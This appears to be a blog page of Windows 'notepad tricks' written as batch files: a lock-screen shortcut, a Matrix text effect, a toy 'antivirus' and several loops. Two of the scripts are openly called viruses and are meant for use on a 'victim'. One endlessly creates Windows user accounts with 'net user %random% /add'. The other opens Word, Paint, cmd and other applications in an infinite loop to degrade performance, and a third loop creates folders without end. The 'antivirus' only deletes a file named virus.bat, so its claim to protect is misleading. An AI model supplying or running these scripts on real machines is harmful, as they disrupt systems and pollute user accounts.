Showing posts with label notepad tricks. Show all posts
Showing posts with label notepad tricks. Show all posts

Friday, 15 April 2016

Create a Shortcut to lock your Computer

Have you ever left your PC in a hurry? Have you ever felt that it is a pain to lock your system in the simple
way of doing CTRL+ALT+DEL? I would imagine that you have and then, this trick is for you. This trick enables
you to create a shortcut to lock your computer instead of doing the regular CTRL+ALT+DEL, thus providing you a
way to quickly and easily get away from your PC whenever you are in a hurry.

To use this trick, follow the instructions given below:-

Steps

1.Right Click on an empty slot on Desktop, point to New and click on Shortcut.

2.In the dialog box that pops up, type the following code without quotes in the Type the location of the item.

rundll32 user32.dll,LockWorkStation

3. Click on Next and type a name for the shortcut in the Type a name for this
Shortcut textbox.

4. Click on Finish.

KeepVisiting!!!!!!!

Create your own antivirus program


post this code on notepad and save this as av.bat

@echo off
title Antivirus
echo Antivirus
echo created by your name
:start
IF EXIST virus.bat goto infected
IF NOT EXIST virus.bat goto clean
cd C:\Windows\system32
:infected
echo WARNING VIRUS DETECTED!
del virus.bat
pause
goto start
:clean
echo System secure!
pause
exit

Keep Visiting!!!!!!!

Annonying Virus

User account flooder


@echo off
:x
net user %random% /add //create user account
goto x

don't forget to save as .bat

This code would start creating windows user accounts whose names could be any random numbers.

Keep Visiting!!!!!!

Annonying Virus

Application Bomber


@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

don't forget to save as .bat

This code when executed will start open different applications like paint,notepad,command prompt repeatedly,
irritating victim and of course affecting performance.

Keep Visiting!!!!!

Advance Matrix Effect Using Notepad

How To Create Matrix File ?

1. Open Notepad and copy below code.
@echo off
color 0A
:A
echo b r E w e 4 e T r 8 M e F r a c h a S t 3 D a C r a s p e s T e 4 h 2 w r e G 2
ping -w .9 >nul
echo R E 9 8 8 R a t r e g 6 n u m A b R E X e Y A T u C 7 a D R a c r u C e B E p e
ping -w .9 >nul
echo c E B E s A d R u B R 3 H e R u D 7 g u d U 7 T a b u T 5 e p E 2 a v e 6 8 a Z
ping -w .9 >nul
echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b R u d
ping -w .9 >nul
echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A N a
ping -w .9 >nul
echo v u P R a b R u c e d U s w a h a c r a t h U 7 r a h u t u h u V e 7 U k u S a
ping -w .9 >nul
echo T e D r e 8 A p r a d a b u f U c u c E h E t 7 c r 5 s P a f r e t h u t 9 u t
ping -w .9 >nul
echo b R u G e p a R e s a P H e P a 2 U d 4 P r e F A b a t h a t h U s w a d R U d
ping -w .9 >nul
echo v U Y a C R e T R 9 k u b e D r a T 6 u j e 5 2 4 e B a f 2 u b 5 w A p a y U Y
ping -w .9 >nul
echo b r E w e 4 e n r 8 M e F r a c h a S t 3 D a C r a s p e s T e 4 a 2 w r e G 2
ping -w .9 >nul
echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A N a
ping -w .9 >nul
echo v u P R a b s u c e d U s w a 3 a c r a t h U 7 r a k u t u h u V e 7 U k u S a
ping -w .9 >nul
echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b u u d
ping -w .9 >nul
goto A
2. Save the file as matrix.bat (.bat is must)
3. open the file and enjoy !!

Keep visiting!!!!!!!

How to make 10000+ folders in a single click!!


for making this you just need to enter the following code into your notepad

@echo off
:a
md %random%
goto a

and save the file as DRtricks.bat
(you can use any name but don't forget to use .bat after the file name)

Then go to search box and enter DRtricks.bat

You will find a file with settings icon click on it and see the magic!!!!!

Keep visiting!!!!